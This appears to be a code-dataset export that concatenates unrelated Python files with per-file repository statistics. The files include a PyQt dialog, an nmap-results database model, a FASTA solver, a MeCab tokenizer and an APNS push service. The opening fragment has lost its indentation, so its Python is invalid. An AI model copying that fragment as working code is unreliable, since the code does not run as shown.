        self.gridLayout.addWidget(self.volume_settings_4, 6, 2, 1, 1)
        self.volume_settings_0 = QtGui.QSlider(Dialog)
        self.volume_settings_0.setMinimum(1)
        self.volume_settings_0.setMaximum(1000)
        self.volume_settings_0.setProperty("value", 702)
        self.volume_settings_0.setSliderPosition(702)
        self.volume_settings_0.setOrientation(QtCore.Qt.Horizontal)
        self.volume_settings_0.setObjectName("volume_settings_0")
        self.gridLayout.addWidget(self.volume_settings_0, 2, 2, 1, 1)
        # Per-voice mute checkboxes in column 3.
        self.box_mute_0 = QtGui.QCheckBox(Dialog)
        self.box_mute_0.setObjectName("box_mute_0")
        self.gridLayout.addWidget(self.box_mute_0, 2, 3, 1, 1)
        self.box_mute_1 = QtGui.QCheckBox(Dialog)
        self.box_mute_1.setObjectName("box_mute_1")
        self.gridLayout.addWidget(self.box_mute_1, 3, 3, 1, 1)
        self.box_mute_2 = QtGui.QCheckBox(Dialog)
        self.box_mute_2.setObjectName("box_mute_2")
        self.gridLayout.addWidget(self.box_mute_2, 4, 3, 1, 1)
        self.box_mute_3 = QtGui.QCheckBox(Dialog)
        self.box_mute_3.setObjectName("box_mute_3")
        self.gridLayout.addWidget(self.box_mute_3, 5, 3, 1, 1)
        self.box_mute_4 = QtGui.QCheckBox(Dialog)
        self.box_mute_4.setObjectName("box_mute_4")
        self.gridLayout.addWidget(self.box_mute_4, 6, 3, 1, 1)
        self.box_mute_all = QtGui.QCheckBox(Dialog)
        self.box_mute_all.setObjectName("box_mute_all")
        self.gridLayout.addWidget(self.box_mute_all, 0, 3, 1, 1)
        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Volume Editor", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_0.setText(QtGui.QApplication.translate("Dialog", "Cheerful Charlie", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_1.setText(QtGui.QApplication.translate("Dialog", "Sad Sandy", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_1.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_2.setText(QtGui.QApplication.translate("Dialog", "Bartitone Bob", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_2.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_3.setText(QtGui.QApplication.translate("Dialog", "Melodic Mary", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_3.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_4.setText(QtGui.QApplication.translate("Dialog", "Precise Pete", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_4.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_0.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_0.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_1.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_2.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_3.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_4.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_all.setText(QtGui.QApplication.translate("Dialog", "Mute all", None, QtGui.QApplication.UnicodeUTF8))
| 62.339286 | 154 | 0.728445 | 6,713 | 0.961472 | 0 | 0 | 0 | 0 | 0 | 0 | 957 | 0.137067 |
eabea33f4d0ec179914a2f9d513c08deb93370e0 | 2,780 | py | Python | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 352 | 2020-01-22T13:36:11.000Z | 2022-03-22T19:37:24.000Z | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 72 | 2020-01-24T04:53:52.000Z | 2021-07-14T19:23:29.000Z | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 86 | 2020-01-23T09:20:51.000Z | 2022-03-03T08:04:37.000Z | import textwrap
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, String, Boolean
from .base_model import Base
from .port_model import Port
from .ip_address_model import IPAddress
from .nse_model import nse_result_association_table
class NmapResult(Base):
""" Database model that describes the TARGET.nmap scan results.
Represents nmap data.
Relationships:
``target``: many to one -> :class:`pipeline.models.target_model.Target`
``ip_address``: one to one -> :class:`pipeline.models.ip_address_model.IPAddress`
``port``: one to one -> :class:`pipeline.models.port_model.Port`
``nse_results``: one to many -> :class:`pipeline.models.nse_model.NSEResult`
"""
def __str__(self):
return self.pretty()
def pretty(self, commandline=False, nse_results=None):
pad = " "
ip_address = self.ip_address.ipv4_address or self.ip_address.ipv6_address
msg = f"{ip_address} - {self.service}\n"
msg += f"{'=' * (len(ip_address) + len(self.service) + 3)}\n\n"
msg += f"{self.port.protocol} port: {self.port.port_number} - {'open' if self.open else 'closed'} - {self.reason}\n"
msg += f"product: {self.product} :: {self.product_version}\n"
msg += "nse script(s) output:\n"
if nse_results is None:
# add all nse scripts
for nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
else:
# filter used, only return those specified
for nse_result in nse_results:
if nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
if commandline:
msg += "command used:\n"
msg += f"{pad}{self.commandline}\n"
return msg
__tablename__ = "nmap_result"
id = Column(Integer, primary_key=True)
open = Column(Boolean)
reason = Column(String)
service = Column(String)
product = Column(String)
commandline = Column(String)
product_version = Column(String)
port = relationship(Port)
port_id = Column(Integer, ForeignKey("port.id"))
ip_address = relationship(IPAddress)
ip_address_id = Column(Integer, ForeignKey("ip_address.id"))
target_id = Column(Integer, ForeignKey("target.id"))
target = relationship("Target", back_populates="nmap_results")
nse_results = relationship("NSEResult", secondary=nse_result_association_table, back_populates="nmap_results")
| 35.641026 | 124 | 0.632014 | 2,501 | 0.89964 | 0 | 0 | 0 | 0 | 0 | 0 | 1,030 | 0.370504 |
eac1009e63e90719aaf42106d1bb45371b8deff9 | 697 | py | Python | examples/isinstance.py | quynhanh-ngx/pytago | de976ad8d85702ae665e97978bc4a75d282c857f | [
"MIT"
] | 206 | 2021-06-24T16:16:13.000Z | 2022-03-31T07:44:17.000Z | examples/isinstance.py | quynhanh-ngx/pytago | de976ad8d85702ae665e97978bc4a75d282c857f | [
"MIT"
] | 13 | 2021-06-24T17:51:36.000Z | 2022-02-23T10:07:17.000Z | examples/isinstance.py | quynhanh-ngx/pytago | de976ad8d85702ae665e97978bc4a75d282c857f | [
"MIT"
] | 14 | 2021-06-26T02:19:45.000Z | 2022-03-30T03:02:49.000Z | def main():
a = ["a", 1, "5", 2.3, 1.2j]
some_condition = True
for x in a:
# If it's all isinstance, we can use a type switch
if isinstance(x, (str, float)):
print("String or float!")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!")
print(":)")
# If it's got mixed expressions, we will inline a switch for the isinstance expression
if isinstance(x, str) and some_condition:
print("String")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!!")
print(":O")
if __name__ == '__main__':
main()
| 26.807692 | 94 | 0.503587 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.319943 |
eac186c65b17deddeada34c9b520c3aaf6930f53 | 964 | py | Python | sarcsdet/utils/mark_ling_feat.py | castargo/SarcDetectionRusModels | f889879bb29d2a0dc8c2fb8a7ff666de21c241ef | [
"MIT"
] | 1 | 2021-05-07T23:04:59.000Z | 2021-05-07T23:04:59.000Z | sarcsdet/utils/mark_ling_feat.py | castargo/SarcDetectionRusModels | f889879bb29d2a0dc8c2fb8a7ff666de21c241ef | [
"MIT"
] | null | null | null | sarcsdet/utils/mark_ling_feat.py | castargo/SarcDetectionRusModels | f889879bb29d2a0dc8c2fb8a7ff666de21c241ef | [
"MIT"
] | null | null | null | from sarcsdet.configs.ling_feat_config import interjections, funny_marks
def funny_marks_feature(text):
text_set = (str(text)).split()
return sum([text_set.count(x) for x in funny_marks])
def interjections_feature(text):
text_set = (str(text)).split()
return sum([text_set.count(x) for x in interjections])
def get_popular_items(column):
items = dict()
for item_list in column:
if item_list:
for item in item_list:
if item in items.keys():
items[item] += 1
else:
items[item] = 1
top_items = dict(sorted(items.items(), key=lambda item: item[1], reverse=True))
for i, key in enumerate(top_items):
top_items[key] = i + 1
result = []
for item_list in column:
if item_list:
result.append(min([top_items[item] for item in item_list]))
else:
result.append(0)
return result
| 26.054054 | 83 | 0.598548 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eac30777aababc6bfca5425e5da95cb001f48c9f | 8,887 | py | Python | fastapy/_fasta.py | proloyd/fastapy | 347ee72d98e4a51bd7c5be9cdbf7667ebb45baab | [
"Apache-2.0"
] | 3 | 2018-05-29T08:45:19.000Z | 2021-06-15T00:08:17.000Z | fastapy/_fasta.py | proloyd/fastapy | 347ee72d98e4a51bd7c5be9cdbf7667ebb45baab | [
"Apache-2.0"
] | null | null | null | fastapy/_fasta.py | proloyd/fastapy | 347ee72d98e4a51bd7c5be9cdbf7667ebb45baab | [
"Apache-2.0"
] | 2 | 2021-01-05T11:48:37.000Z | 2021-06-15T00:08:18.000Z | # Author: Proloy Das <proloy@umd.edu>
"""Module implementing the FASTA algorithm"""
import numpy as np
from math import sqrt
from scipy import linalg
import time
import logging
def _next_stepsize(deltax, deltaF, t=0):
"""A variation of spectral descent step-size selection: 'adaptive' BB method.
Reference:
---------
B. Zhou, L. Gao, and Y.H. Dai, 'Gradient methods with adaptive step-sizes,'
Comput. Optim. Appl., vol. 35, pp. 69-86, Sept. 2006
parameters
----------
deltax: ndarray
difference between coefs_current and coefs_next
deltaF: ndarray
difference between grad operator evaluated at coefs_current and coefs_next
returns
-------
float
adaptive step-size
"""
n_deltax = (deltax ** 2).sum() # linalg.norm(deltax, 'fro') ** 2
n_deltaF = (deltaF ** 2).sum() # linalg.norm(deltaF, 'fro') ** 2
innerproduct_xF = np.real((deltax * deltaF).sum())
if n_deltax == 0:
return 0
elif (n_deltaF == 0) | (innerproduct_xF == 0):
return -1
else:
tau_s = n_deltax / innerproduct_xF # steepest descent
tau_m = innerproduct_xF / n_deltaF # minimum residual
# adaptive BB method
if 2 * tau_m > tau_s:
return tau_m
else:
return tau_s - 0.5 * tau_m
def _compute_residual(deltaf, sg):
"""Computes residuals"""
res = sqrt(((deltaf + sg) ** 2).sum())
a = sqrt((deltaf ** 2).sum())
b = sqrt((sg ** 2).sum())
res_r = res / (max(a, b) + 1e-15)
return res, res_r
def _update_coefs(x, tau, gradfx, prox, f, g, beta, fk, linesearch=True):
"""Non-monotone line search
parameters
----------
x: ndarray
current coefficients
tau: float
step size
gradfx: ndarry
gradient operator evaluated at current coefficients
prox: function handle
proximal operator of :math:`g(x)`
f: callable
smooth differentiable function, :math:`f(x)`
g: callable
non-smooth function, :math:`g(x)`
beta: float
backtracking parameter
fk: float
maximum of previous function values
returns
-------
z: ndarray
next coefficients
"""
x_hat = x - tau * gradfx
z = prox(x_hat, tau)
fz = f(z)
count = 0
if linesearch:
while fz > fk + (gradfx * (z - x)).sum() + ((z - x) ** 2).sum() / (2 * tau):
# np.square(linalg.norm(z - x, 'fro')) / (2 * tau):
count += 1
tau *= beta
x_hat = x - tau * gradfx
z = prox(x_hat, tau)
fz = f(z)
sg = (x_hat - z) / tau
return z, fz, sg, tau, count
class Fasta:
r"""Fast adaptive shrinkage/threshold Algorithm
Reference
---------
Goldstein, Tom, Christoph Studer, and Richard Baraniuk. "A field guide to forward-backward
splitting with a FASTA implementation." arXiv preprint arXiv:1411.3406 (2014).
Parameters
----------
f: function handle
smooth differentiable function, :math:`f(x)`
g: function handle
non-smooth convex function, :math:`g(x)`
gradf: function handle
gradient of smooth differentiable function, :math:`\\nabla f(x)`
proxg: function handle
proximal operator of non-smooth convex function
:math:`proxg(v, \\lambda) = argmin g(x) + \\frac{1}{2*\\lambda}\|x-v\|^2`
beta: float, optional
backtracking parameter
default is 0.5
n_iter: int, optional
number of iterations
default is 1000
Attributes
----------
coefs: ndvar
learned coefficients
objective_value: float
optimum objective value
residuals: list
residual values at each iteration
initial_stepsize: float, optional
created only with verbose=1 option
objective: list, optional
objective values at each iteration
created only with verbose=1 option
stepsizes: list, optional
stepsizes at each iteration
created only with verbose=1 option
backtracks: list, optional
number of backtracking steps
created only with verbose=1 option
Notes
-----
Make sure that outputs of gradf and proxg is of same size as x.
The implementation does not check for any such discrepancies.
Use
---
Solve following least square problem using fastapy
:math:`\\min .5||Ax-b||^2 + \\mu*\|x\|_1`
Create function handles
>>> def f(x): return 0.5 * linalg.norm(np.dot(A, x) - b, 2)**2 # f(x) = .5||Ax-b||^2
>>> def gradf(x): return np.dot(A.T, np.dot(A, x) - b) # gradient of f(x)
>>> def g(x): return mu * linalg.norm(x, 1) # mu|x|
>>> def proxg(x, t): return shrink(x, mu*t)
>>> def shrink(x, mu): return np.multiply(np.sign(x), np.maximum(np.abs(x) - mu, 0)) #proxg(z,t) = sign(x)*max(
|x|-mu,0)
Create FASTA instance
>>> lsq = Fasta(f, g, gradf, proxg)
Call solver
>>> lsq.learn(x0, verbose=True)
"""
def __init__(self, f, g, gradf, proxg, beta=0.5, n_iter=1000):
self.f = f
self.g = g
self.grad = gradf
self.prox = proxg
self.beta = beta
self.n_iter = n_iter
self.residuals = []
self._funcValues = []
self.coefs_ = None
def __str__(self):
return "Fast adaptive shrinkage/thresholding Algorithm instance"
def learn(self, coefs_init, tol=1e-4, verbose=True, linesearch=True, next_stepsize=_next_stepsize):
r"""fits the model using FASTA algorithm
parameters
----------
coefs_init: ndarray
initial guess
tol: float, optional
tolerance parameter
default is 1e-8
verbose: bool
verbosity of the method : 1 will display informations while 0 will display nothing
default = 0
linesearch: bool
if True (Default) uses line-search to fine step-size
next_stepsize: callable
a callable with argument (\deltax, \deltaGradf) which provides next step-size.
Default is a non-monotone step-size selection ('adaptive' BB) method.
returns
-------
self
"""
logger = logging.getLogger("FASTA")
coefs_current = np.copy(coefs_init)
grad_current = self.grad(coefs_current)
coefs_next = coefs_current + 0.01 * np.random.randn(coefs_current.shape[0], coefs_current.shape[1])
grad_next = self.grad(coefs_next)
tau_current = next_stepsize(coefs_next - coefs_current, grad_next - grad_current, 0)
self._funcValues.append(self.f(coefs_current))
if verbose:
self.objective = []
self.objective.append(self._funcValues[-1] + self.g(coefs_current))
self.initial_stepsize = np.copy(tau_current)
self.stepsizes = []
self.backtracks = []
start = time.time()
logger.debug(f"Iteration \t objective value \t step-size \t backtracking steps taken \t residual")
for i in range(self.n_iter):
coefs_next, objective_next, sub_grad, tau, n_backtracks \
= _update_coefs(coefs_current, tau_current, grad_current,
self.prox, self.f, self.g, self.beta, max(self._funcValues), linesearch)
self._funcValues.append(objective_next)
grad_next = self.grad(coefs_next)
# Find residual
delta_coef = coefs_current - coefs_next
delta_grad = grad_current - grad_next
residual, residual_r = _compute_residual(grad_next, sub_grad)
self.residuals.append(residual)
residual_n = residual / (self.residuals[0] + 1e-15)
# Find step size for next iteration
tau_next = next_stepsize(delta_coef, delta_grad, i)
if verbose:
self.stepsizes.append(tau)
self.backtracks.append(n_backtracks)
self.objective.append(objective_next + self.g(coefs_next))
logger.debug(
f"{i} \t {self.objective[i]} \t {self.stepsizes[i]} \t {self.backtracks[i]} \t {self.residuals[i]}")
# Prepare for next iteration
coefs_current = coefs_next
grad_current = grad_next
if tau_next == 0.0 or min(residual_n, residual_r) < tol: # convergence reached
break
elif tau_next < 0.0: # non-convex probelms -> negative stepsize -> use the previous value
tau_current = tau
else:
tau_current = tau_next
end = time.time()
self.coefs_ = coefs_current
self.objective_value = objective_next + self.g(coefs_current)
if verbose:
logger.debug(f"total time elapsed : {end - start}s")
return self
| 33.160448 | 120 | 0.590976 | 6,203 | 0.697986 | 0 | 0 | 0 | 0 | 0 | 0 | 4,872 | 0.548216 |
eac399423be5d4d4f542d0d58d41f6e21f9aff4b | 607 | py | Python | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 45 | 2020-01-18T03:46:07.000Z | 2022-03-26T13:06:36.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 1 | 2020-08-16T12:42:05.000Z | 2020-08-16T12:42:05.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 9 | 2020-01-04T09:09:01.000Z | 2022-01-17T08:56:23.000Z | # -*- coding: utf-8 -*-
# Author: XuMing <xuming624@qq.com>
# Brief:
import os
import pickle
def load_pkl(pkl_path):
"""
加载词典文件
:param pkl_path:
:return:
"""
with open(pkl_path, 'rb') as f:
result = pickle.load(f)
return result
def dump_pkl(vocab, pkl_path, overwrite=True):
"""
存储文件
:param pkl_path:
:param overwrite:
:return:
"""
if os.path.exists(pkl_path) and not overwrite:
return
with open(pkl_path, 'wb') as f:
# pickle.dump(vocab, f, protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(vocab, f, protocol=0)
| 19.580645 | 65 | 0.599671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 284 | 0.452951 |
eac4092c3274f3888ffd4211164c3fe9025a7e49 | 5,839 | py | Python | chat_service/mecab_service/mecab_ner_app/app/application/service/mecab_parser.py | YoungchanChang/ES_BERT_CHAT | 5dd919d3ba559ca9171ca73bd9e1052734f3060e | [
"Apache-2.0"
] | 1 | 2022-02-13T03:09:23.000Z | 2022-02-13T03:09:23.000Z | chat_service/mecab_service/mecab_ner_app/app/application/service/mecab_parser.py | YoungchanChang/ES_BERT_CHAT | 5dd919d3ba559ca9171ca73bd9e1052734f3060e | [
"Apache-2.0"
] | null | null | null | chat_service/mecab_service/mecab_ner_app/app/application/service/mecab_parser.py | YoungchanChang/ES_BERT_CHAT | 5dd919d3ba559ca9171ca73bd9e1052734f3060e | [
"Apache-2.0"
] | 1 | 2022-02-13T03:09:23.000Z | 2022-02-13T03:09:23.000Z | import copy
import _mecab
from collections import namedtuple
from typing import Generator
from mecab import MeCabError
from domain.mecab_domain import MecabWordFeature
def delete_pattern_from_string(string, pattern, index, nofail=False):
""" 문자열에서 패턴을 찾아서 *로 변환해주는 기능 """
# raise an error if index is outside of the string
if not nofail and index not in range(len(string)):
raise ValueError("index outside given string")
# if not erroring, but the index is still not in the correct range..
if index < 0: # add it to the beginning
return pattern + string
if index > len(string): # add it to the end
return string + pattern
len_pattern = len(pattern)
blank_pattern = len(pattern) * "*"
# insert the new string between "slices" of the original
return string[:index] + blank_pattern + string[index + len_pattern:]
STRING_NOT_FOUND = -1
Feature = namedtuple('Feature', [
'pos',
'semantic',
'has_jongseong',
'reading',
'type',
'start_pos',
'end_pos',
'expression',
])
def _create_lattice(sentence):
lattice = _mecab.Lattice()
lattice.add_request_type(_mecab.MECAB_ALLOCATE_SENTENCE) # Required
lattice.set_sentence(sentence)
return lattice
def _get_mecab_feature(node) -> MecabWordFeature:
# Reference:
# - http://taku910.github.io/mecab/learn.html
# - https://docs.google.com/spreadsheets/d/1-9blXKjtjeKZqsf4NzHeYJCrr49-nXeRF6D80udfcwY
# - https://bitbucket.org/eunjeon/mecab-ko-dic/src/master/utils/dictionary/lexicon.py
# feature = <pos>,<semantic>,<has_jongseong>,<reading>,<type>,<start_pos>,<end_pos>,<expression>
values = node.feature.split(',')
assert len(values) == 8
values = [value if value != '*' else None for value in values]
feature = dict(zip(Feature._fields, values))
feature['has_jongseong'] = {'T': True, 'F': False}.get(feature['has_jongseong'])
return MecabWordFeature(node.surface, **feature)
class MecabParser:
"""
문장을 형태소 분석하는 클래스.
형태소 분석시 형태소 분석 토큰, 스페이스 분석 토큰의 인덱스 위치도 함께 저장
"""
FIRST_WORD = 0
type_list = ["Compound", "Inflect"]
def __init__(self, sentence: str, dicpath=''):
argument = ''
if dicpath != '':
argument = '-d %s' % dicpath
self.tagger = _mecab.Tagger(argument)
self.sentence = sentence
self.sentence_token = self.sentence.split()
def _get_space_token_idx(self, mecab_word_feature: MecabWordFeature) -> int:
"""
스페이스로 토큰 분석한 인덱스 값 반환
:param mecab_word_feature: 메캅 단어 특성데이터
:return: 스페이스 토큰 분석한 결과
"""
for idx_token, sentence_token_item in enumerate(self.sentence_token):
index_string = sentence_token_item.find(mecab_word_feature.word)
if index_string != STRING_NOT_FOUND:
self.sentence_token[idx_token] = delete_pattern_from_string(sentence_token_item, mecab_word_feature.word, index_string)
return idx_token
return False
def gen_mecab_token_feature(self) -> Generator:
"""
메캅으로 형태소 분석한 토큰 제너레이터로 반환
스페이스로 분석한 토큰의 정보와 형태소로 분석한 토큰의 정보 포함
"""
lattice = _create_lattice(self.sentence)
if not self.tagger.parse(lattice):
raise MeCabError(self.tagger.what())
for mecab_token_idx, mecab_token in enumerate(lattice):
mecab_token_feature = _get_mecab_feature(mecab_token)
mecab_token_feature.mecab_token_idx = mecab_token_idx
space_token_idx = self._get_space_token_idx(mecab_token_feature)
if space_token_idx is not False:
mecab_token_feature.space_token_idx = space_token_idx
mecab_token_feature.word = mecab_token_feature.word.lower()
yield mecab_token_feature
def tokenize_mecab_compound(self) -> Generator:
"""
메캅으로 분석한 토큰 제너레이터로 반환 결과 중에 복합여, 굴절형태소 있는 경우 토큰화
"""
for compound_include_item in self.gen_mecab_token_feature():
if compound_include_item.type in self.type_list:
compound_item_list = compound_include_item.expression.split("+")
for compound_item in compound_item_list:
word, pos_tag, _ = compound_item.split("/")
copy_compound_include_item = copy.deepcopy(compound_include_item)
copy_compound_include_item.word = word
yield word, copy_compound_include_item
else:
yield compound_include_item.word, compound_include_item
def gen_mecab_compound_token_feature(self) -> Generator:
"""
:return: 복합어를 분해한 메캅 토큰 순서가 들어간 단어
"""
for idx, x in enumerate(list(self.tokenize_mecab_compound())):
copy_x = copy.deepcopy(x)
copy_x[1].mecab_token_compound_idx = idx
yield copy_x
def get_word_from_mecab_compound(self, is_list=False):
"""
메캅으로 분해된 문장에서 단어만 추출
:param is_list: 리스트로 반환 여부
:return: 메캅으로 분해된 문장에서 단어만 포함된 문장
"""
if is_list:
return [x[self.FIRST_WORD] for x in list(self.gen_mecab_compound_token_feature())]
return " ".join([x[self.FIRST_WORD] for x in list(self.gen_mecab_compound_token_feature())])
if __name__ == "__main__":
test_sentence = "나는 서울대병원에 갔어"
mecab_parse_results = list(
MecabParser(test_sentence).gen_mecab_token_feature())
for idx, mecab_parse_item in enumerate(mecab_parse_results):
print(mecab_parse_item)
mecab_parse_results = list(
MecabParser(test_sentence).gen_mecab_compound_token_feature())
for idx, mecab_parse_item in enumerate(mecab_parse_results):
print(mecab_parse_item) | 30.89418 | 135 | 0.651995 | 3,810 | 0.599906 | 2,080 | 0.327507 | 0 | 0 | 0 | 0 | 1,874 | 0.295072 |
eac468dad9691c91dffb6abb70d8d6fdcf16423a | 206 | py | Python | linux/.local/scripts/update_pip_pkgs.py | rodrigoestevao/configuration-files | b2517da7654005db1884973d7ced2cb1cc72feac | [
"MIT"
] | null | null | null | linux/.local/scripts/update_pip_pkgs.py | rodrigoestevao/configuration-files | b2517da7654005db1884973d7ced2cb1cc72feac | [
"MIT"
] | null | null | null | linux/.local/scripts/update_pip_pkgs.py | rodrigoestevao/configuration-files | b2517da7654005db1884973d7ced2cb1cc72feac | [
"MIT"
] | null | null | null | import pkg_resources
from subprocess import call
packages = [dist.project_name for dist in pkg_resources.working_set]
call(
f"pip install --upgrade --no-cache-dir {' '.join(packages)}", shell=True
)
| 20.6 | 76 | 0.742718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.291262 |
eac49b50576a3ac373bc861cf088d4e821e40708 | 385 | py | Python | yaga_ga/evolutionary_algorithm/operators/single_individual/base.py | alessandrolenzi/yaga | 872503ad04a2831135143750bc309188e5685284 | [
"MIT"
] | null | null | null | yaga_ga/evolutionary_algorithm/operators/single_individual/base.py | alessandrolenzi/yaga | 872503ad04a2831135143750bc309188e5685284 | [
"MIT"
] | null | null | null | yaga_ga/evolutionary_algorithm/operators/single_individual/base.py | alessandrolenzi/yaga | 872503ad04a2831135143750bc309188e5685284 | [
"MIT"
] | null | null | null | from abc import abstractmethod
from typing import TypeVar
from yaga_ga.evolutionary_algorithm.operators.base import GeneticOperator
IndividualType = TypeVar("IndividualType")
GeneType = TypeVar("GeneType")
class SingleIndividualOperator(GeneticOperator[IndividualType, GeneType]):
@abstractmethod
def __call__(self, _parent1: IndividualType) -> IndividualType:
...
| 27.5 | 74 | 0.794805 | 174 | 0.451948 | 0 | 0 | 95 | 0.246753 | 0 | 0 | 26 | 0.067532 |
eac5a5ec7e6cccad032db49002c1fac937db1360 | 7,746 | py | Python | pulsus/services/apns/service.py | pennersr/pulsus | ace014ca40e3928b235e1bcfebe22301c7f3cafe | [
"MIT"
] | 14 | 2015-01-16T07:48:43.000Z | 2019-04-19T23:13:50.000Z | pulsus/services/apns/service.py | pennersr/pulsus | ace014ca40e3928b235e1bcfebe22301c7f3cafe | [
"MIT"
] | null | null | null | pulsus/services/apns/service.py | pennersr/pulsus | ace014ca40e3928b235e1bcfebe22301c7f3cafe | [
"MIT"
] | 2 | 2015-08-06T12:52:56.000Z | 2019-02-07T18:09:23.000Z | import logging
import os
import struct
import binascii
import gevent
from gevent import socket, ssl
from gevent.event import Event
from gevent.queue import Queue
from ..base.service import BaseService
from .notification import APNSNotification
INITIAL_TIMEOUT = 5
MAX_TIMEOUT = 600
logger = logging.getLogger(__name__)
class APNSService(BaseService):
service_type = 'apns'
def __init__(self, sandbox=True, **kwargs):
self._send_queue = Queue()
self._send_queue_cleared = Event()
self._send_greenlet = None
self.timeout = INITIAL_TIMEOUT
self._feedback_queue = Queue()
if "certfile" not in kwargs:
raise ValueError(u"Must specify a PEM bundle.")
if not os.path.exists(kwargs['certfile']):
raise ValueError('PEM bundle file not found')
self._sslargs = kwargs
self._push_connection = None
self._sandbox = sandbox
self._error_queue = Queue()
self._send_greenlet = None
self._error_greenlet = None
self._feedback_connection = None
self._feedback_greenlet = None
self.last_err = None
def start(self):
"""Start the message sending loop."""
if self._send_greenlet is None:
self._send_greenlet = gevent.spawn(self.save_err, self._send_loop)
def _send_loop(self):
self._send_greenlet = gevent.getcurrent()
try:
logger.info("%s service started" % self.service_type)
while True:
message = self._send_queue.get()
try:
self.send_notification(message)
except Exception:
self.error_sending_notification(message)
else:
self.timeout = INITIAL_TIMEOUT
finally:
if self._send_queue.qsize() < 1 and \
not self._send_queue_cleared.is_set():
self._send_queue_cleared.set()
except gevent.GreenletExit:
pass
finally:
self._send_greenlet = None
logger.info("%s service stopped" % self.service_type)
def _check_send_connection(self):
if self._push_connection is None:
tcp_socket = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0)
s = ssl.wrap_socket(tcp_socket, ssl_version=ssl.PROTOCOL_TLSv1,
**self._sslargs)
addr = ["gateway.push.apple.com", 2195]
if self._sandbox:
addr[0] = "gateway.sandbox.push.apple.com"
logger.debug('Connecting to %s' % addr[0])
s.connect_ex(tuple(addr))
self._push_connection = s
self._error_greenlet = gevent.spawn(self.save_err,
self._error_loop)
def _check_feedback_connection(self):
if self._feedback_connection is None:
tcp_socket = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0)
s = ssl.wrap_socket(tcp_socket, ssl_version=ssl.PROTOCOL_TLSv1,
**self._sslargs)
addr = ["feedback.push.apple.com", 2196]
if self._sandbox:
addr[0] = "feedback.sandbox.push.apple.com"
logger.debug('Connecting to %s' % addr[0])
s.connect_ex(tuple(addr))
self._feedback_connection = s
def _error_loop(self):
self._error_greenlet = gevent.getcurrent()
try:
while True:
if self._push_connection is None:
break
msg = self._push_connection.recv(1 + 1 + 4)
if len(msg) < 6:
return
data = struct.unpack("!bbI", msg)
self._error_queue.put((data[1], data[2]))
except gevent.GreenletExit:
logger.exception('Error')
finally:
if self._push_connection is not None:
self._push_connection.close()
self._push_connection = None
self._error_greenlet = None
def _feedback_loop(self):
self._feedback_greenlet = gevent.getcurrent()
try:
self._check_feedback_connection()
while True:
msg = self._feedback_connection.recv(4 + 2 + 32)
if len(msg) < 38:
return
data = struct.unpack("!IH32s", msg)
token = binascii.b2a_hex(data[2]).decode('ascii')
self._feedback_queue.put((data[0], token))
except gevent.GreenletExit:
logger.exception('Error')
finally:
if self._feedback_connection:
self._feedback_connection.close()
self._feedback_connection = None
self._feedback_greenlet = None
def queue_notification(self, obj):
"""Send a push notification"""
if not isinstance(obj, APNSNotification):
raise ValueError(u"You can only send APNSNotification objects.")
self._send_queue.put(obj)
def get_error(self, block=True, timeout=None):
"""
Get the next error message.
Each error message is a 2-tuple of (status, identifier)."""
return self._error_queue.get(block=block, timeout=timeout)
def get_feedback(self, block=True, timeout=None):
"""
Get the next feedback message.
Each feedback message is a 2-tuple of (timestamp, device_token)."""
